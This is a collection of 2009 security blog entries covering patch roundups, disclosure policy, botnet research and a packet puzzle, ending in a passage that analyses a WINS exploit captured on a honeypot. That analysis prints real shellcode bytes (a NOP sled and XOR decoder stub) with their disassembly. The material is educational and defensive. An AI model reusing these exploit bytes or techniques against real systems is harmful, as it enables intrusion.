-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler


Published: 2009-05-12

Adobe Acrobat (reader) patches released

While patching your Macs and Windows machines on reboot Wednesday tomorrow, don't forget to patch Adobe's Acrobat (Reader) as well.

CVE-2009-1492 and CVE-2009-1493 are fixed.


Swa Frantzen -- Section 66


Published: 2009-05-12

Apple patches and updates

Apple released patches today:

  • Apple OS X 10.5.7 update  / Security update 2009-002

    10.5.7 is an update of the operating system (much like a service pack in the Windows world) and contains functionality fixes as well as security updates.

    The security content of this update is:

    • Apache: CVE-2008-2939, CVE-2008-0456
    • ATS: CVE-2009-0154
    • BIND (update to 9.3.6-P1 or 9.4.2-P1): CVE-2009-0025
    • CFNetwork: CVE-2009-0144, CVE-2009-0157
    • CoreGraphics: CVE-2009-0155, CVE-2009-0146, CVE-2009-0147, CVE-2009-0165
    • Cscope: CVE-2009-0148
    • CUPS: CVE-2009-0164
    • Disk Images: CVE-2009-0150, CVE-2009-0149
    • Enscript (update to 1.6.4): CVE-2004-1184, CVE-2004-1185, CVE-2004-1186, CVE-2008-3863
    • Flash Player plug-in (update to or CVE-2009-0519, CVE-2009-0520, CVE-2009-0114
    • Help Viewer: CVE-2009-0942, CVE-2009-0943
    • iChat: CVE-2009-0152
    • International Components for Unicode: CVE-2009-0153
    • IPSec:CVE-2008-3651, CVE-2008-3652
    • Kerberos: CVE-2009-0845, CVE-2009-0846, CVE-2009-0847, CVE-2009-0844
    • Kernel: CVE-2008-1517
    • Launch Services: CVE-2009-0156
    • libxml: CVE-2008-3529
    • Net-SNMP: CVE-2008-4309
    • Network Time: CVE-2009-0021, CVE-2009-0159
    • Networking: CVE-2008-3530
    • OpenSSL: CVE-2008-5077
    • PHP: CVE-2008-3659, CVE-2008-2829, CVE-2008-3660, CVE-2008-2666, CVE-2008-2371, CVE-2008-2665, CVE-2008-3658, CVE-2008-5557 (upgrade to 5.2.8)
    • QuickDraw Manager: CVE-2009-0160, CVE-2009-0010
    • Ruby (a.o. update to 1.8.6-p287): CVE-2008-3443, CVE-2008-3655, CVE-2008-3656, CVE-2008-3657, CVE-2008-3790, CVE-2009-0161
    • Safari: CVE-2009-0162
    • Spotlight: CVE-2009-0944
    • system_cmds
    • telnet: CVE-2009-0158
    • WebKit: CVE-2009-0945
    • X11 (a.o. updates to FreeType 2.3.8, libpng 1.2.35): CVE-2006-0747, CVE-2007-2754, CVE-2008-2383, CVE-2008-1382, CVE-2009-0040, CVE-2009-0946

    As always, this update is all or nothing: no mixing and matching of the fixes you need more urgently than others.

  • Safari 4 beta
    • libxml:  CVE-2008-3529
    • Safari:  CVE-2009-0162
    • WebKit:  CVE-2009-0945
  • Safari 3.2.3
    • libxml:  CVE-2008-3529
    • Safari:  CVE-2009-0162
    • WebKit:  CVE-2009-0945

Swa Frantzen -- Section 66



Published: 2009-05-12

MSFT's version of responsible disclosure

Microsoft is the big company that screams the loudest about "responsible disclosure".

They want an unlimited amount of time to release their patches before those who found the problem are allowed to publish (though publishing the second after Microsoft releases the patch is fine for Microsoft; for their customers it's a bit of a different matter, of course). Of course attackers couldn't care less about disclosure, and even some vulnerability researchers don't care for the credit line that Microsoft offers, nor for the "irresponsible" brand it might earn them.

Still a policy typically cuts both ways: you need to obey the rules yourself just as well as all the others.

So let's have a look at MS09-017:

  • An unprecedented bunch of CVEs fixed.
  • Vulnerabilities in Office 2004 and 2008
  • Vulnerabilities in Works 8.5 and 9.0
  • No fixes for Office 2004, Office 2008, Works 8.5 nor Works 9.0

We all know from past experience that reverse engineering patches back into exploits starts when the patches are released, if not before. Typically it takes between a few hours and a day or so if the vulnerability is easy to exploit (and Microsoft's own new exploitability ratings point out that these are pretty easy).

So in the end Microsoft just released what hackers need to attack:

  • CVE-2009-0224 on Office 2004, Office 2008, the XML converter tools on the Mac, Works 8.5 and Works 9.0; according to Microsoft themselves, this CVE was not publicly known.
  • CVE-2009-0556 on Office 2004 (this one was publicly known and actively used); the attack against the old Mac software might be news to some, and there is still no patch available.
  • CVE-2009-1130 on Office 2004; according to Microsoft themselves, this vulnerability was not publicly known.

So what do you think of Microsoft and their "responsible" behavior in releasing MS09-017 as it was done?
You can use the poll ...

Swa Frantzen -- Section 66





Published: 2009-05-12

May Black Tuesday Overview

Overview of the May 2009 Microsoft patches and their status.

MS09-017: A multitude of vulnerabilities allow random code execution.

While Office for Mac versions and Works are affected by some of the vulnerabilities disclosed in the advisory, there are NO patches available from Microsoft at this time for these products.
Replaces MS08-051.

KB article: KB 967340
Known exploits: CVE-2009-0556 is actively exploited, with exploit code publicly known since April 2nd, 2009; see also SA969136.
ISC rating(*): clients PATCH NOW, servers Important.
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment and usage of the machine, and the common measures people typically already have in place. For servers we presume simple best practices, such as not using Outlook, MSIE, Word, etc. on them for traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them

Swa Frantzen -- Section 66


Published: 2009-05-11

Sysinternals Updates 3 Applications

Sysinternals blog has announced three new updates.  Thanks to Roseman for the heads up!

Autoruns v9.5: This update to Autoruns, a powerful autostart manager, adds display of audio and video codecs, which are gaining popularity as an extension mechanism used by malware to gain automatic execution.

PsLoglist v2.7: This version of PsLoglist, a command-line event log display utility, now properly displays event log entries for default event log sources on Windows Vista and higher and accepts wildcard matching for event sources.

PsExec v1.95: This version of PsExec, a utility for executing applications remotely, fixes an issue that prevented the -i (interactive) switch from working on Windows XP systems with a recent hotfix and includes a number of minor bug fixes.

Mari Nichols


Published: 2009-05-10

Is your Symantec Antivirus Alerting working correctly?

In the past several months multiple difficulties have arisen with Symantec AMS (Alert Management System).  The situation may sound familiar: one minute the settings are configured correctly and alerting properly; the next thing you know, days have gone by without any detection.  This is great, right?  No viruses in our network!  Wrong… A careful inspection of the SAV console showed numerous detections without any alerts, and AMS no longer showed that alerting was configured.

Symantec informed the network technician that the AMS server needed to be reloaded.  This was tried a few times; each time, the services stopped again within days.  Finally a Symantec tech said that this was a “known issue”.  The workaround was either to continue reloading the AMS services every time they stopped working, taking the chance that we wouldn't receive alerts, or to use the alternative, the Reporting Server, for alerting.

Days later, on April 28, 2009, Symantec disclosed four security vulnerabilities in SYM-09-007 involving some of the same Intel services involved in the issues described above.  At this point it is unclear whether the vulnerabilities are related to the malfunctioning alerts, but it wouldn't hurt to check your configurations.  The mitigations sound familiar.

The related services and vulnerabilities are described here and include the following:

1) Intel Common Base Agent Remote Command Execution Vulnerability

2) Intel Alert Originator Service Stack Overflow Vulnerability

3) Intel Alert Originator Service Buffer Overflow Vulnerabilities

4) Alert Management System Console Arbitrary Program Execution Design Error Vulnerability

Please take a few minutes to verify your version of SAV with this vulnerability announcement.  Then double check your alerting configurations. If anyone has any experience with the same issues, please let us know here.

Mari Nichols

PS:  Happy Mother's Day!  Don't forget to call your Mom.... :-)



Published: 2009-05-09

Shared SQL Injection Lessons Learned blog item

The X-Force Frequency Blog has a great read posted yesterday by Harlan Carvey sharing some IR lessons learned, SQL Injection Lessons from X-Force Emergency Response Service Investigations.


Published: 2009-05-09

Unusable, Unreadable, or Indecipherable? No Breach reporting required

Recent HIPAA legislation promised guidance identifying "the Technologies and Methodologies That Render Protected Health Information Unusable, Unreadable, or Indecipherable to Unauthorized Individuals for Purposes of the Breach Notification Requirements under Section 13402 of Title XIII (Health Information Technology for Economic and Clinical Health Act) of the American Recovery and Reinvestment Act of 2009" (ARRA). The guidance was issued (link below).

So if a covered entity loses the jewels and its technologies and methodologies are up to snuff, it does not have to report the breach.

At this point, the way TLS is referenced, it looks to me like the guidance points to TLS impacts on organizations and security vendors/service providers. YMMV.

There are a large number of high impact HIPAA changes written into ARRA, see;
The American Recovery and Reinvestment Act of 2009

The Guidance;
45 CFR PARTS 160 and 164
Guidance Specifying the Technologies and Methodologies That Render Protected Health Information Unusable, Unreadable, or Indecipherable to Unauthorized Individuals for Purposes of the Breach Notification Requirements under Section 13402 of Title XIII (Health Information Technology for Economic and Clinical Health Act) of the American Recovery and Reinvestment Act of 2009


B. Guidance Specifying the Technologies and Methodologies that Render Protected Health Information Unusable, Unreadable, or Indecipherable to Unauthorized Individuals

Protected health information (PHI) is rendered unusable, unreadable, or indecipherable to unauthorized individuals only if one or more of the following applies:

a)      Electronic PHI has been encrypted as specified in the HIPAA Security Rule by "the use of an algorithmic process to transform data into a form in which there is a low probability of assigning meaning without use of a confidential process or key"15 and such confidential process or key that might enable decryption has not been breached. Encryption processes identified below have been tested by the National Institute of Standards and Technology (NIST) and judged to meet this standard.

i)        Valid encryption processes for data at rest are consistent with NIST Special Publication 800-111, Guide to Storage Encryption Technologies for End User Devices.17

ii) Valid encryption processes for data in motion are those that comply with the requirements of Federal Information Processing Standards (FIPS) 140-2. These include, as appropriate, standards described in NIST Special Publications 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations; 800-77, Guide to IPsec VPNs; or 800-113, Guide to SSL VPNs, and may include others which are FIPS 140-2 validated.18

b)      The media on which the PHI is stored or recorded has been destroyed in one of the following ways:

i)                    Paper, film, or other hard copy media have been shredded or destroyed such that the PHI cannot be read or otherwise cannot be reconstructed.

ii)                  Electronic media have been cleared, purged, or destroyed consistent with NIST Special Publication 800-88, Guidelines for Media Sanitization,19 such that the PHI cannot be retrieved.

Guide to Storage Encryption for End User Devices

FIPS 140-2

NIST Special Publications 800-52 - Guidelines for the Selection and Use of Transport Layer Security

Guide to IPsec VPNs

Guide to SSL VPNs

Guidelines for Media Sanitization


Published: 2009-05-07

Botnet hijacking reveals 70GB of stolen data

Thanks to our reader Crill, who today gave us a heads-up on an interesting research project recently conducted at a large university.


It appears that researchers at the university infiltrated the Torpig botnet and watched its activity for ten days:

"During the ten days in which they had control of the botnet, the researchers made some interesting observations. Although they recorded more than 1.2 million IP addresses for infected systems, on the basis of unique bot IDs recorded, this turned out to represent only 180,000 systems."

And what did they find:

"Over these ten days Torpig sent large volumes of data to the researchers, including details of 8310 accounts at 410 different financial institutions."

Check out the link for the full report of what they found and more interesting facts.  The scary thing is that this is just one of many such botnets wreaking havoc on the Internet every day.  I know...  I deal with them continuously, due to customers with infected machines sending massive amounts of spam.  Shut one down and another takes its place.  The joy of the Internet.




Published: 2009-05-07

Malicious Content on the Web

Today must be a full moon day!  We have had several reports of strange malicious content on otherwise good websites.   One of them is confirmed by Trend Micro.

The first is a fake/Trojanized Windows 7 Release Candidate (RC) build release.  The Trojan is being referred to as TROJ_DROPPER.SPX.  From Trend Micro's release:

"It is a self extracting executable that contains two executables: one is the original Windows 7 RC build named SETUP.EXE, and the other is CODEC.EXE. Trend Micro detects CODEC.EXE as TROJ_AGENT.NICE. When an unsuspecting user executes the Trojanized setup file, the embedded malware is also executed. As a result, malicious routines of the embedded file are exhibited on the affected system."

The full article can be found at:


The second item is a possible infection, your typical "your computer is infected, click here to scan and clean it" scam, on the usatoday.com website.  We have received more than one report of this but have not been able to confirm it.  We suspect that if it is indeed there, it is an ad somewhere on their site.  Several of the handlers have tried to find the offending ad and have so far been unsuccessful.  We have contacted the appropriate individuals at usatoday.com to advise them of the reports.

If any of our other readers have seen this type of activity and can tell us what page you were on and whether a link or an ad was clicked that triggered it, we would like to hear from you, so that we can pinpoint the problem and work with USAToday to get it cleaned up.

Other reports we have received say that an adware program is being installed on computers when clicking on the link to get the free chicken coupon from Oprah's website.  I have sent an email to the webmaster and have heard nothing back yet.  The scary thing about the chicken coupon is that hundreds of people have downloaded it; just think of all of the computers that may now have the malware installed.  Again, I can't confirm this because I haven't tried to download the coupon and I haven't heard anything back from their webmaster.

If you have any information about this we would like to hear about it too.





Published: 2009-05-07

A packet challenge and how I solved it

Yesterday morning (EDT in the US), our friend Chris Christianson twittered the following:

4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 4153 7461 7262 7563 6b73 6361 7264   

I didn't see it in time to win his little challenge, but I figured I'd throw out how I decoded it and how I would have responded had @quine not already beaten me to it.  It was pretty obviously (well, to us packet geeks anyway) an IPv4 packet in hex, so I copied the text and saved it in a text file named foocap.txt (I could have just used echo, but I thought I might want to go back to it).  Then I ran the following (note: text2pcap is part of the Wireshark package, so Wireshark and tcpdump both need to be installed on your Linux box to do this):


jac@cantor[531]$ cat foocap.txt | perl -pe 'print "000000 ";s/(..)(..)\s/$1." ".$2." "/ge' | \
text2pcap -e 0x800 - - | tcpdump -Xnnr - 
Input from: Standard input
Output to: Standard output
Generate dummy Ethernet header: Protocol: 0x800
Wrote packet of 54 bytes at 0
Read 1 potential packet, wrote 1 packet
reading from file -, link-type EN10MB (Ethernet)
11:10:08.000000 IP > ICMP echo request, id 23079, seq 512, length 34
    0x0000:  4500 0036 308b 0000 4001 0000 7f00 0001  E..60...@.......
    0x0010:  7f00 0001 0800 89f3 5a27 0200 3173 7432  ........Z'..1st2
    0x0020:  444d 6d65 6765 7473 4153 7461 7262 7563  DMmegetsAStarbuc
    0x0030:  6b73 6361 7264                           kscard


And there it is.  An ICMP echo request that says the first to DM him (via Twitter) gets a Starbucks card.  So, my response would have been to take the payload and run it through hping3 to create an echo reply packet (or maybe just change the ICMP type, which would have been even simpler).  Of course, I don't drink coffee, but I suppose my daughter could have used the card.  It turns out that hping3 is how Chris created the original packet anyway, so he probably would have enjoyed getting an echo reply back as the response.  Anyway, he posted about his challenge on his blog; you can find it here: http://ismellpackets.wordpress.com/2009/05/06/packet-challenge/
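Incidentally, the same decode can be done without text2pcap or tcpdump at all.  A few lines of Python are enough to peel off the IP and ICMP headers and print the payload:

```python
# Decode the challenge by hand: strip the IP header (length taken from
# the IHL field) and the 8-byte ICMP header, then read the payload.
HEX = (
    "4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001"
    " 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473"
    " 4153 7461 7262 7563 6b73 6361 7264"
)

def icmp_payload(hexdump):
    pkt = bytes.fromhex(hexdump.replace(" ", ""))
    ihl = (pkt[0] & 0x0F) * 4          # IP header length in bytes
    assert pkt[ihl] == 8               # ICMP type 8: echo request
    return pkt[ihl + 8:].decode("ascii")

print(icmp_payload(HEX))               # 1st2DMmegetsAStarbuckscard
```

The text2pcap route is still handy when you want a real pcap file to feed into Wireshark, but for a one-packet challenge this is quicker.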


Published: 2009-05-06

Follow The Bouncing Malware: Gone With the WINS

"Isn't it kind of noisy?", his wife shouted over the roar of the new server's cooling fans.

"It just needs to warm up," he replied, "It'll quiet down in a bit."

His wife pointed at her ears, and shrugged as if to say "I can't hear you" and wandered out of his upstairs office, shaking her head.

She didn't understand.  She never understood.

Joe Sixpack caressed the shiny black case of the server as it sat tipped between his desk and the filing cabinet, tilted at an awkward angle.  It was a beautiful thing, and it had been such a bargain.  He had found it on a whim, wandering through a sale liquidating the assets of a small data processing startup just up the street from his house.  When he asked the bored clerk about it, he had reluctantly dug though an enormous pile of papers and had handed Joe a copy of the machine's original documentation.  The itemized description on the purchase order was pretty much gibberish as far as Joe was concerned, but his eyes were drawn to one phrase in particular: "Operating System: Windows Server 2003."

Never mind the fact that it was a "rackmount" machine, whatever that meant.  It was a SERVER, and that was COOL.  Besides, as a victim of the economic downturn, the company was selling off its assets at pennies on the dollar.  He had paid only a fraction of what the purchase order said the machine had originally cost.

"Look," the clerk had said as he was writing up a receipt, "if you're thinking of trying to get information off of the hard drive, understand that this thing never actually saw service."  Perhaps it was Joe's blank expression that had prompted him to add, "You understand...this machine is kinda old... it's been sitting on the shelf for a long time... and all sales are final."

Even when he was counting out the money to pay for the machine, Joe wasn't entirely sure what he would use it for.  He had, in the past, kicked around the idea of setting up a server and hosting a website of his own-- maybe he might even start one of those blog things.  He also had an amazingly diverse and extensive collection of porn-- he thought about how cool it would be to start his own "adult site."  On the drive home, he even came up with a name: Sixpack's SexPics.

Despite the clerk's stern warning, the server had powered up just fine and Joe eventually moved it from his desk to what he finally decided was the perfect spot: sitting upright, between the edge of his desk and the filing cabinet.  Unfortunately, he was wrong about the machine quieting down over time-- if anything, as the evening wore on, it seemed to get louder. 

Joe swapped over the monitor, mouse, and keyboard cables from his desktop machine and, after a few false starts (he had never noticed before that the end of a USB cable fit perfectly into a network jack1), was able to get a picture up on the screen.

The clerk had been right: it looked like the machine had never been booted up.  Joe worked his way down through the setup dialog, answering the questions as best he could.  He had to unhook everything and switch back to his desktop machine a couple of times to look up what something meant on Google, but the hassle was worth it when he was finally able to log in as "Administrator."  He was running his own server.

He dug around in the box of stuff that the guy from his ISP had left behind when he installed his Internet service and found what he wanted: a network cable.  He had to move some things around on his desk, but he was finally able to stretch the cable enough to plug it between the back of the server and the back of the router.  The little light on the front of the router instantly lit up and began blinking-- and Joe was pretty sure that was a good sign.  He tried firing up Internet Explorer, and sure enough, he was able to get to Yahoo.com-- his server was connected to the Internet.

Or, it was "sort of" connected.  Joe had spent some time playing with the settings on his router-- so much so that he had to do a hard-reset-- twice now-- but he remembered something interesting that he had seen.  He pointed IE at the IP address of the router and logged in, after looking through the router's manual for the default password (like he would ever change THAT again!).  He clicked around a bit until finally finding the setting he was looking for.  It took him another forty minutes of searching on Google, but he was finally able to figure out how to find the IP address of the new machine and enter it into the router's "DMZ" setting.  It was nearing midnight and he was getting sleepy, so he clicked "OK," truly connecting his server to the Internet.  He switched off the monitor and the lights and went to bed-- a brand new server administrator who was hoping to dream about the photo shoots he would direct for Sixpack's SexPics.

But, while Joe was drifting off to dreams of the "action" in his first big photo shoot, something eerily similar was happening to the freshly minted Sixpack's SexPics' server.  A fun and interesting conversation was taking place on port 42/TCP between Joe's "new" machine (a machine that had been sitting on a shelf when Microsoft released MS04-045) and another machine somewhere in Korea.


  1. They do.  But don't try it.  Really.  This means you.  Yes you.  Don't look at me like that.  You know that you're just sitting there, fighting the urge to go try it-- acting all nonchalant, like you don't care. It's slowly eating away at you.  We both know that you're trying to think of something... anything else... just to keep your mind off of wanting to rip the nearest USB cable out of its jack so you can go check to see if I'm telling you the truth.  But I am.  I am.  Would I lie to you? 

It Happened One Night

At this point in most of the other FTBM postings, I would-- in a rare display of lucidity-- take a moment to step aside from my normally disjointed prose to warn you, my dear reader, of the perils of embarking on any attempt to "play around" with the malicious code we're about to examine.  Having discovered, over these many years, that none of you actually pay one damn bit of attention to what I say, I've decided to say "t'hell with it..."  Have fun! Launch the malware! Run with scissors!  Play with matches!  Swim right after eating!  Don't wear clean underwear, you'll never be in an accident!  Your mother was WRONG!

(Ok, jus' so you know... the running-with-scissors thing sorta freaks me out... so don't.  And don't play with matches-- you'll tick off the people at chemistry.com.  But, that being said, if you really wanna eat a big, honkin' meal, put on your dirtiest underwear, and go swimming-- be my guest.  Just tell me what pool you were in so I can avoid it like the plague.)

The impetus for this new, malwarerific installment was the "compromise" of a honeypot machine that I run.  Thus, if you found the whole "backstory" of Joe Sixpack gettin' him some "server" to be a bit contrived, you're probably right.  And you can bite me.  Everybody's a critic...

Two vulnerabilities in the WINS service (Windows Internet Naming Service - a service that maps IP addresses to NetBIOS computer names and vice versa) were first described by Microsoft in the MS04-045 bulletin, released on December 14, 2004.  Now if you're saying, "Tom, that's ancient history!  No one would STILL be vulnerable to that!", I would first tell you that you don't know me well enough to call me "Tom"-- it's "Mr. Liston" to you-- and then I would mock you heartily and ask you what Internet you've been hanging out on lately.  My honeypot got hit two weeks ago: and if it was the only machine on the Internet that was vulnerable, do you think the kiddyz would still be lookin'?

The crux of the vulnerability that will be 'sploited on Joe's machine is an issue with how the WINS service deals with information that is exchanged as part of what is known as "WINS Replication"-- a feature of the WINS service that allows multiple WINS servers to keep their information synchronized.  Think of it as DNS "zone transfers" being done in a... well... a pretty dumb way.  The stupidity comes from the fact that in WINS Replication, the server actually sends the client a record that contains memory pointers (a value that says to the client, "hey, you need to go this far forward or backward in this chunk of memory to find this particular information").  Compound that stupidity by the fact that on an unpatched machine, ain't nobody checkin' to see that the memory pointer received isn't pointing somewhere outside of the data being sent.  The upshot: a specially crafted WINS Replication packet can be used by an attacker to hijack the memory pointer, overflow a buffer, and execute arbitrary code on a vulnerable machine.
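To make the bug class concrete, here's a hedged sketch in C.  This is purely illustrative-- the function name, packet layout, and record handling are all my invention, not the actual WINS code-- but it shows the core mistake: following an offset that arrived in the packet itself, with the kind of bounds check the unpatched code lacked.

```c
#include <stddef.h>
#include <stdint.h>

/* Illustrative sketch only-- NOT the actual WINS code.  An offset
 * arrives inside the replication packet itself, and the unpatched
 * service followed it blindly.  The comparison below is the kind of
 * sanity check the vulnerable code was missing. */
const uint8_t *fetch_record(const uint8_t *pkt, size_t pkt_len, size_t offset)
{
    if (pkt == NULL || offset >= pkt_len)  /* refuse pointers outside the data */
        return NULL;
    return pkt + offset;
}
```

Without that single comparison, a hostile "replication partner" can point the service anywhere it likes relative to the received data-- which is exactly how the buffer gets overflowed.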

Just so you're aware, we're about to embark on a rather high-speed journey deep into the innards of a malware attack.  Like all cool stuff, some assembly may be required.  Please keep your arms and legs inside the car and do not unfasten your safety harness until the ride has come to a complete stop.

(Assembly language purists out there... I cut some corners in the following to keep this at a level where -- hopefully -- everyone can follow along.  Forgive me.)


When the Korean server hits the Sixpack's SexPics server, it fires over a series of specially crafted WINS Replication packets, designed to diddle with the memory pointers used by the WINS service. Being a mindless piece of code, the WINS service takes the bogus memory pointers, does exactly what they tell it to do, and overwrites a chunk of its own memory.  The WINS service ends up getting whacked because it trusts the data that it is sent-- and that trust ends up being betrayed-- which leads to it eventually executing the attacker's code buried deep inside that data.  Let's take a look at the hexadecimal representation of the beginning of that code:

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 EB 10 5A 4A 33 C9 66 B9 77 01 80 34
0A 99 E2 FA EB 05 E8 EB FF FF FF CD 12 75 1A 75
B1 12 6D 71 60 99 99 99 10 9F 66 AF F1 17 D7 97
75 71 9D 98 99 99 10 DF 9D 66 AF F1 EB 67 2A 8F

Right up front, we notice a pretty long string of hex 90's... let's talk a little about why that's there.  Overwriting memory and overflowing buffers to execute code isn't what you would call an "exact" science.  There are differences in architectures (i.e. a program built for a different language edition of Windows will have a slightly different memory layout... also, there are different versions of code on different versions of operating systems, etc...) so there's a little "slop" in even the most calculated attack.  Those hex 90's make up what we in the biz call a "NOP Sled."  The idea is this: when the attacker overwrites memory, due to the differences in the various classes of machines that they're attacking, they may not be entirely sure of where their overwritten memory will land.  So, rather than having an exact point to jump to when they want to execute their code, the attackers create a little "cushion" for themselves.  Those hex 90s represent a special instruction on the x86 architecture called the NOP (pronounced "NO-OP").  That instruction does pretty much what it sounds like it does: nothing-- it exists, primarily, to allow for padding and synchronization within programs.  The really cool thing about the NOP instruction is that, in addition to doing nothing, it is only one byte long (most x86 instructions require multiple bytes).  By placing a field of NOP instructions in front of the code that they want to execute, the attacker needs only to land "somewhere" in that field to ensure that he will eventually land at the correct starting point for his malicious code.  The execution, in essence, "slides" down the sled right to the place where the attacker's code is waiting.
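If you want to see the "slide" in action without actually running shellcode, here's a toy simulation (entirely my own, hedged illustration-- nothing here executes anything): land anywhere in the run of 0x90 bytes and you skid forward to the same payload entry point.

```c
#include <stddef.h>

/* Toy model of a NOP sled-- we don't execute anything, we just walk
 * forward past 0x90 (the one-byte x86 NOP) until we hit the first
 * non-NOP byte: the start of the real payload. */
size_t slide(const unsigned char *buf, size_t len, size_t landing)
{
    size_t i = landing;
    while (i < len && buf[i] == 0x90)
        i++;
    return i;
}
```

No matter where in the sled the hijacked execution "lands," it ends up at the same place: the first real instruction of the attacker's code.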

Any Number Can Play

So, at the bottom of our NOP sled, what do we find?  Looking at the code in a disassembler, we see this:

00000458                 jmp     short loc_46A
0000045A ; =============== S U B R O U T I N E ====================
0000045A sub_45A         proc near        ; CODE XREF: sub_45A+10 p
0000045A                 pop     edx
0000045B                 dec     edx
0000045C                 xor     ecx, ecx
0000045E                 mov     cx, 177h
00000462 loc_462:                         ; CODE XREF: sub_45A+C j
00000462                 xor     byte ptr [edx+ecx], 99h
00000466                 loop    loc_462
00000468                 jmp     short loc_46F
0000046A ; --------------------------------------------------------
0000046A loc_46A:                         ; CODE XREF: 00000458 j
0000046A                 call    sub_45A
0000046F loc_46F:                         ; CODE XREF: sub_45A+E j
0000046F                 int     12h

The hex numbers at the left (and the other "location" references) represent an offset into the data that I pulled from the attack.  The first instruction that we run into at the bottom of the NOP sled tells us to jump ahead (JMP) to location 0x46A.  Looking there, we see that the code "calls" a subroutine (another chunk of code), at location 0x45A.  Let's take a look at what that subroutine does.

The first thing that the subroutine does is perform a POP operation.  To understand what the POP instruction does, you need to know a little about a programming structure known as "the stack."  The stack is a temporary storage area that your computer's processor uses to hold onto values with a fairly limited lifetime.  If you've ever gone through the line at a cafeteria, you might remember a magical device that holds a big stack of plates and yet somehow, whenever you remove one, another one pops up to take its place.  If you put the plate you just took back on the stack, it somehow, remarkably, adjusts itself so that the plates sink below it, leaving your plate right back where it started. (Note: Yes, I'm easily amused...)  Well, that "stack" of plates is an incredibly good analogy for the "stack" used by a computer processor.  We "PUSH" values onto the stack and we then "POP" them back off again.  Remember, however, just like in a cafeteria, even if the top plate isn't the one you want (you know the one... all crusty with some sort of unidentifiable goo), you can't get to the one below it without taking the yucky one off first.  Thus, like the stack in the computer, the plate stack is a "Last In, First Out" (or "LIFO") stack.
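For the code-minded, the plate analogy boils down to a few lines.  This is a hedged, toy stack (the names and the fixed size are mine, purely for illustration-- nothing from the exploit):

```c
#include <stddef.h>

/* A tiny LIFO stack, like the processor's: PUSH puts a value on top,
 * POP takes the most recently pushed value off first.  No bounds
 * checking-- this is an illustration, not production code. */
typedef struct {
    int    data[16];
    size_t top;       /* index of the next free slot */
} Stack;

void push(Stack *s, int v) { s->data[s->top++] = v; }
int  pop(Stack *s)         { return s->data[--s->top]; }
```

Push 1, 2, 3 and they come back off as 3, 2, 1-- last in, first out.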

So, if our first action upon hitting the malicious code is to "call" a subroutine, what's on the stack?  We're popping a value out, but we didn't push a value in there to begin with!  Ah... here is where it's important to know and understand a little bit about what goes on behind the scenes when you "call" a subroutine.  Remember, when I said that the stack was used for temporary storage?  Well, not only do programmers explicitly use the stack for storing values temporarily, but the processor itself uses the stack as well.  When we "call" a subroutine, we're actually asking the processor to temporarily suspend the current "flow" of the program and to go off and do something else for a bit.  When it's done doing that "something else," we expect that it will return to the original program flow.  But how does the processor know where to go back to?  It uses the stack to store a temporary value, pointing back to the instruction that it should return to when the work of the subroutine is finished.  Think of it like this: you're reading along in a book (this is the normal program flow...), and you get a phone call (the program "calls" a subroutine).  What do you do?  You use a bookmark, to save your location in the book...  or, if you're a cretin, you fold down the corner of the page.  When you're done with the phone call (the subroutine finishes), you go back to your place in the book.

In this case, the malware author needs to find out where his code is.  Remember, we talked earlier about using a NOP sled to get around not having exact knowledge about the location of the code, but now we really need to firm up our grasp of where, EXACTLY, we are, and there ain't no binary-level Tom-Tom (me-me) available.  So what's a locationally-challenged malware author to do?  Call a subroutine and steal the processor's "bookmark" off of the stack!  We see that, immediately after entering the subroutine, the code pops a value off of the stack into the register EDX (registers are another temporary storage location upon which the processor is able to perform various operations...).  It then decrements (DEC) that value by one and voila! We now have a pointer to the exact memory location where we came from. 

Having done all of that, the code then XORs the value in another register, ECX, with itself.  XOR?

The XOR function is pretty simple, actually.  It's a bit-wise operation, meaning that it takes two numbers and compares them at the bit level.  If the bits match, then, in the resulting value, that bit is turned "off" (0).  If the bits are different, then that bit will be turned "on" (1) in the resulting value.  So, if you XOR any number with itself, the resulting value has every bit turned off (really... think about it...).  So, XORing a register with itself is simply a fast way for the code to completely clear the register.  Another interesting result of the XOR function is that, if you take any number, XOR it with any other value (we'll call that value the "key"), and then XOR the result with the "key" value again, you get back the original number.  Pretty cool, eh?  XORing is a cheap and dirty (and easily broken) means of "encrypting" things. (And double-XOR encryption is... well... a joke.)
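Both of those XOR properties are easy to check for yourself (the helper names here are mine, purely for demonstration):

```c
#include <stdint.h>

/* x ^ x == 0: XORing any value with itself clears every bit--
 * which is why the shellcode zeroes a register with "xor ecx, ecx". */
uint8_t xor_clear(uint8_t x)
{
    return (uint8_t)(x ^ x);
}

/* (x ^ k) ^ k == x: XORing with the same key twice is the identity--
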